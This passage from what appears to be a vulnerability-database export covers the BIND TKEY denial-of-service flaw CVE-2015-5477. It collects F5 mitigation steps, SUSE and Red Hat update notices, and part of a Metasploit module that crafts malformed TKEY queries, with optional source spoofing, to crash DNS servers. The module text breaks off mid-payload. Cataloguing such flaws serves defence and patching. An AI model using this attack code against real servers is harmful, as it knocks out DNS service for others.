\n\n**3**These versions are vulnerable if configured with a pool that uses the Return to DNS load balancing method or when the pool's** **Alternate and Fallback load balancing methods are set to **None** and all pools associated with the wide IP are unavailable.\n\n**4**Although BIG-IQ/Enterprise Manager contains the vulnerable code, BIG-IQ/Enterprise Manager systems do not use the vulnerable code in a way that exposes the vulnerability.\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nBIG-IP\n\nTo mitigate this vulnerability, you can use the DNS Caching and DNS Express features instead of BIND. In addition, to mitigate the issue on the management IP address, restrict access to that IP address to trusted hosts only.\n\nTo mitigate the issue on the self IP address, do not allow port 53 on the self IP address. If your self IP address is configured to use the default allow, you can remove that port from the list of the default allowed services.\n\n**_Ensuring that TCP/UDP port 53 is not allowed as a default service (allow-service default)_**\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. List the default services allowed by the **allow-service default **setting, by typing the following command: \n\nlist net self-allow\n\nOutput appears similar to the following example:\n\nnet self-allow { \ndefaults { \nospf:any \ntcp:domain \ntcp:f5-iquery \ntcp:https \ntcp:snmp \ntcp:ssh \nudp:520 \nudp:cap \nudp:domain \nudp:f5-iquery \nudp:snmp \n} \n}\n\n 3. 
If TCP port 53 (tcp:53 or tcp:domain) or UDP port 53 (udp:53 or udp:domain) are listed as a default allowed port, you should delete the entries by typing the following command: \n\nmodify net self-allow defaults delete { tcp:domain udp:domain }\n\n 4. Save the configuration by typing the following command: \n\nsave sys config\n\n**_Disabling the Use BIND Server on BIG-IP option on the DNS profile_**\n\nTo mitigate the issue on the DNS profile, you can disable the **Use BIND Server on BIG-IP** option by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** Delivery** > **Profiles **> **DNS** or **Local Traffic** >** Profiles** >** Services** > **DNS.**\n 3. Select the applicable DNS profile.\n 4. From the **Use BIND Server on BIG-IP** option, select **Disabled.**\n 5. Click **Finished**.\n**Important:** Disabling the BIND server can impact DNS configurations that use BIND as a fallback method (return to DNS) for resolution.\n\nBIG-IP GTM/Link Controller\n\n**_Verifying whether you have configured any listener addresses to share a self IP (BIG-IP GTM/Link Controller)_**\n\nListener addresses that share a self IP address will expose the system to this vulnerability. To verify whether you have configured a listener address to share a self IP, run the following commands:\n\n * tmsh list /net self address\n * tmsh list /gtm listener address\n\nIf you have configured a listener address to share a self IP, you should reconfigure the address to use a unique IP address.\n\n_Choosing a load balancing method other than Return to DNS for the GTM pool (BIG-IP GTM)_\n\n**Important**: If DNS Express is not configured, BIG-IP GTM or Link Controller systems will respond to **A**, **AAAA**, and **CNAME** type DNS record queries only. Queries for other types of records, such as **NS** or **MX**, will fail. 
\n\nTo mitigate the issue on the GTM pool, you can use a load balancing method other than **Return to DNS** by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** GSLB **>** Pools.**\n 3. From the **Pool List **menu, select the applicable name.\n 4. Click the **Members** tab.\n 5. Choose a load balancing method other than **Return to DNS**.\n 6. Click **Update**.\n\n * [K14510: Overview of BIG-IP DNS request processing](<https://support.f5.com/csp/article/K14510>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n", "cvss3": {}, "published": "2015-07-28T22:18:00", "type": "f5", "title": "BIND vulnerability CVE-2015-5477", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2017-03-31T22:32:00", "id": "F5:K16909", "href": "https://support.f5.com/csp/article/K16909", "cvss": {"score": 7.8, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:44:24", "description": "**1**These versions are vulnerable if a self IP address or management IP address is configured to allow inbound connections on port 53. \n\n**2**These versions are vulnerable if a DNS profile is configured with the** Use BIND Server on BIG-IP **option (enabled by default). \n\n**3**These versions are vulnerable if configured with a pool that uses the **Return to DNS** load balancing method or when the pool's** Alternate** and **Fallback** load balancing methods are set to **None** and all pools associated with the wide IP are unavailable.\n\n4 Although BIG-IQ/Enterprise Manager contains the vulnerable code, BIG-IQ/Enterprise Manager systems do not use the vulnerable code in a way that exposes the vulnerability.\n\nVulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The** Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\n**BIG-IP**\n\nTo mitigate this vulnerability, you can use the DNS Caching and DNS Express features instead of BIND. In addition, to mitigate the issue on the management IP address, restrict access to that IP address to trusted hosts only.\n\nTo mitigate the issue on the self IP address, do not allow port 53 on the self IP address. 
If your self IP address is configured to use the default allow, you can remove that port from the list of the default allowed services.\n\n**_Ensuring that TCP/UDP port 53 is not allowed as a default service (allow-service default)_**\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. List the default services allowed by the **allow-service default **setting, by typing the following command: \n\nlist net self-allow\n\nOutput appears similar to the following example:\n\nnet self-allow { \ndefaults { \nospf:any \ntcp:domain \ntcp:f5-iquery \ntcp:https \ntcp:snmp \ntcp:ssh \nudp:520 \nudp:cap \nudp:domain \nudp:f5-iquery \nudp:snmp \n} \n}\n\n 3. If TCP port 53 (tcp:53 or tcp:domain) or UDP port 53 (udp:53 or udp:domain) are listed as a default allowed port, you should delete the entries by typing the following command: \n\nmodify net self-allow defaults delete { tcp:domain udp:domain }\n\n 4. Save the configuration by typing the following command: \n\nsave sys config\n\n**_Disabling the Use BIND Server on BIG-IP option on the DNS profile_**\n\nTo mitigate the issue on the DNS profile, you can disable the **Use BIND Server on BIG-IP** option by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** Delivery** > **Profiles **> **DNS** or **Local Traffic** >** Profiles** >** Services** > **DNS.**\n 3. Select the applicable DNS profile.\n 4. From the **Use BIND Server on BIG-IP** option, select **Disabled.**\n 5. Click **Finished**.\n**Important:** Disabling the BIND server can impact DNS configurations that use BIND as a fallback method (return to DNS) for resolution.\n\n**BIG-IP GTM/Link Controller**\n\n_Verifying whether you have configured any listener addresses to share a self IP (BIG-IP GTM/Link Controller)_ \n \nListener addresses that share a self IP address will expose the system to this vulnerability. 
To verify whether you have configured a listener address to share a self IP, run the following commands:\n\n * tmsh list /net self address\n * tmsh list /gtm listener address\n\nIf you have configured a listener address to share a self IP, you should reconfigure the address to use a unique IP address.\n\n_Choosing a load balancing method other than Return to DNS for the GTM pool (BIG-IP GTM)_\n\n**Important**: If DNS Express is not configured, BIG-IP GTM or Link Controller systems will respond to **A**, **AAAA**, and **CNAME** type DNS record queries only. Queries for other types of records, such as **NS** or **MX**, will fail. \n \nTo mitigate the issue on the GTM pool, you can use a load balancing method other than **Return to DNS** by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** GSLB **>** Pools.**\n 3. From the **Pool List **menu, select the applicable name.\n 4. Click the **Members** tab.\n 5. Choose a load balancing method other than **Return to DNS**.\n 6. 
Click **Update**.\n\nSupplemental Information\n\n * SOL14510: Overview of BIG-IP DNS request processing\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "f5", "title": "SOL16909 - BIND vulnerability CVE-2015-5477", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2016-04-29T00:00:00", "id": "SOL16909", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/900/sol16909.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:18:32", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "cvss3": {}, "published": "2015-07-28T21:09:26", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T21:09:26", "id": "SUSE-SU-2015:1305-1", "href": 
"http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00044.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:31:51", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (boo#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "cvss3": {}, "published": "2015-08-03T12:08:36", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-03T12:08:36", "id": "OPENSUSE-SU-2015:1335-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-08/msg00001.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:32", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "cvss3": {}, "published": "2015-07-30T14:08:45", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-30T14:08:45", "id": "SUSE-SU-2015:1316-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00045.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:57", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\n Exposure to this 
issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "cvss3": {}, "published": "2015-07-28T21:08:56", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T21:08:56", "id": "SUSE-SU-2015:1304-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00043.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:42:04", "description": "bind was updated to fix one security issue:\n\n * CVE-2015-5477: Remote Denial-of-Service via TKEY queries.\n (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or configuration\n options limiting or denying service because the exploitable code occurs\n early in the packet handling.\n\n Security Issues:\n\n * CVE-2015-5477\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477>\n\n\n", "cvss3": {}, "published": "2015-07-30T18:09:56", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-30T18:09:56", "id": "SUSE-SU-2015:1322-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00048.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:37:02", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (boo#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "cvss3": {}, "published": 
"2015-07-31T12:08:25", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477", "CVE-2015-4620", "CVE-2015-1349"], "modified": "2015-07-31T12:08:25", "id": "OPENSUSE-SU-2015:1326-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00050.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:08:02", "description": "This update for bind fixes the following issues:\n\n * CVE-2015-8000: Remote denial of service by mis-parsing incoming\n responses. (bsc#958861)\n * CVE-2015-5722: DoS against servers performing validation on\n DNSSEC-signed records. (bsc#944066)\n * CVE-2015-5477: DoS against authoritative and recursive servers.\n * CVE-2015-8704: Specific APL data could trigger a crash. (bsc#962189)\n\n Security Issues:\n\n * CVE-2015-8000\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8000>\n * CVE-2015-5722\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5722>\n * CVE-2015-5477\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477>\n * CVE-2015-8704\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8704>\n\n\n", "cvss3": {}, "published": "2016-01-25T15:11:48", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-8704", "CVE-2015-5477", "CVE-2015-8000", "CVE-2015-5722"], "modified": "2016-01-25T15:11:48", "id": "SUSE-SU-2016:0227-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00033.html", "cvss": 
{"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2021-10-19T18:41:49", "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "redhat", "title": "(RHSA-2015:1513) Important: bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2018-06-06T16:24:18", "id": "RHSA-2015:1513", "href": "https://access.redhat.com/errata/RHSA-2015:1513", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T04:42:34", "description": "The Berkeley Internet 
Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "redhat", "title": "(RHSA-2015:1514) Important: bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2017-09-08T08:17:54", "id": "RHSA-2015:1514", "href": "https://access.redhat.com/errata/RHSA-2015:1514", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T04:43:49", "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. 
BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "redhat", "title": "(RHSA-2015:1515) Important: bind97 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2017-09-08T08:16:32", "id": "RHSA-2015:1515", "href": "https://access.redhat.com/errata/RHSA-2015:1515", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T04:47:11", "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. 
BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain malformed\nDNSSEC keys. A remote attacker could use this flaw to send a specially\ncrafted DNS query (for example, a query requiring a response from a zone\ncontaining a deliberately malformed key) that would cause named functioning\nas a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain\nrecords with malformed class attributes. A remote attacker could use this\nflaw to send a query to request a cached record with a malformed class\nattribute that would cause named functioning as an authoritative or\nrecursive server to crash. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive\nservers, however authoritative servers are at limited risk if they perform\nauthentication when making recursive queries to resolve addresses for\nservers listed in NS RRSETs.\n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477,\nCVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges Jonathan\nFoote as the original reporter of CVE-2015-5477, and Hanno B\u00f6ck as the\noriginal reporter of CVE-2015-5722.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing the\nupdate, the BIND daemon (named) will be restarted automatically.", "cvss3": {}, "published": "2016-01-28T00:00:00", "type": "redhat", "title": "(RHSA-2016:0079) Important: bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000"], "modified": "2016-09-03T22:18:39", "id": "RHSA-2016:0079", "href": "https://access.redhat.com/errata/RHSA-2016:0079", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T04:45:47", "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA denial of service flaw was found in the way BIND followed DNS\ndelegations. A remote attacker could use a specially crafted zone\ncontaining a large number of referrals which, when looked up and processed,\nwould cause named to use excessive amounts of memory or crash.\n(CVE-2014-8500)\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain malformed\nDNSSEC keys. 
A remote attacker could use this flaw to send a specially\ncrafted DNS query (for example, a query requiring a response from a zone\ncontaining a deliberately malformed key) that would cause named functioning\nas a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain\nrecords with malformed class attributes. A remote attacker could use this\nflaw to send a query to request a cached record with a malformed class\nattribute that would cause named functioning as an authoritative or\nrecursive server to crash. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive\nservers, however authoritative servers are at limited risk if they perform\nauthentication when making recursive queries to resolve addresses for\nservers listed in NS RRSETs.\n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477,\nCVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges Jonathan\nFoote as the original reporter of CVE-2015-5477, and Hanno B\u00f6ck as the\noriginal reporter of CVE-2015-5722.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing the\nupdate, the BIND daemon (named) will be restarted automatically.", "cvss3": {}, "published": "2016-01-28T00:00:00", "type": "redhat", "title": "(RHSA-2016:0078) Important: bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000"], "modified": "2016-09-03T22:14:18", "id": "RHSA-2016:0078", "href": "https://access.redhat.com/errata/RHSA-2016:0078", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "metasploit": [{"lastseen": "2022-03-17T23:59:24", "description": "This module sends a malformed TKEY query, which exploits an error in handling TKEY queries on affected BIND9 'named' DNS servers. As a result, a vulnerable named server will exit with a REQUIRE assertion failure. 
This condition can be exploited in versions of BIND between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0 through 9.10.2-P2.\n", "cvss3": {}, "published": "2015-08-01T11:01:35", "type": "metasploit", "title": "BIND TKEY Query Denial of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-11-16T18:18:28", "id": "MSF:AUXILIARY/DOS/DNS/BIND_TKEY/", "href": "https://www.rapid7.com/db/modules/auxiliary/dos/dns/bind_tkey/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Capture\n include Msf::Auxiliary::UDPScanner\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BIND TKEY Query Denial of Service',\n 'Description' => %q{\n This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. 
This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.\n },\n 'Author' => [\n 'Jonathan Foote', # Original discoverer\n 'throwawayokejxqbbif', # PoC\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2015-5477'],\n ['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],\n ['URL', 'https://kb.isc.org/article/AA-01272']\n ],\n 'DisclosureDate' => '2015-07-28',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\n ))\n\n register_options([\n Opt::RPORT(53),\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\n ])\n\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\n end\n\n def scan_host(ip)\n if datastore['SRC_ADDR']\n scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])\n else\n print_status(\"Sending packet to #{ip}\")\n scanner_send(payload, ip, rport)\n end\n end\n\n def payload\n name = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\n txt = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\n\n name_length = [name.length].pack('C')\n txt_length = [txt.length].pack('C')\n data_length = [txt.length + 1].pack('n')\n ttl = [rand(2 ** 31 - 1) + 1].pack('N')\n\n query = \"\\x00\\x00\" # Transaction ID: 0x0000\n query << \"\\x00\\x00\" # Flags: 0x0000 Standard query\n query << \"\\x00\\x01\" # Questions: 1\n query << \"\\x00\\x00\" # Answer RRs: 0\n query << \"\\x00\\x00\" # Authority RRs: 0\n query << \"\\x00\\x01\" # Additional RRs: 1\n\n query << name_length # [Name Length]\n query << name # Name\n query << \"\\x00\" # [End of name]\n query << \"\\x00\\xf9\" # Type: TKEY (Transaction Key) (249)\n query << \"\\x00\\x01\" # Class: IN (0x0001)\n\n query << name_length # [Name Length]\n query << name # Name\n query << \"\\x00\" # [End of name]\n query << \"\\x00\\x10\" # Type: TXT (Text strings) (16)\n query << \"\\x00\\x01\" # 
